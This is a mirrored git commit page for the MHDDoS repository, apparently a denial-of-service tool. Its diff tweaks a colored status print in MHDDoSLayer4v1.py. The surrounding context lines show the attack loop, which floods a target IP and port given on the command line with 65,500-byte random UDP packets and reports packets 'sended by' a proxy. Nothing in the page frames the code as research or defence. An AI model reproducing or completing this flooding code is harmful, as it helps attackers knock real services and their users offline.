mirror of https://github.com/MatrixTM/MHDDoS.git
Update MHDDoSLayer4v1.py
This commit is contained in:
parent
feefa5f378
commit
25990f035a
|
|
@ -57,7 +57,7 @@ def main():
|
|||
else:
|
||||
port = int(sys.argv[2])
|
||||
sock.sendto(random._urandom(65500),(str(sys.argv[1]),int(port)))
|
||||
print(randoms,"| \033[97m[\033[92m!\033[97m] \033[97mPacket Sended By\033[96m", str(proxy.rstrip("\n\r")))
|
||||
print(' \033[92m',randoms,"| \033[97m[\033[92m!\033[97m] \033[97mPacket Sended By\033[96m", str(proxy.rstrip("\n\r")))
|
||||
except socket.error:
|
||||
sock.sendto(random._urandom(65500),(str(sys.argv[1]),int(port)))
|
||||
except socket.timeout:
|
||||
|
|
|
|||
Loading…
Reference in New Issue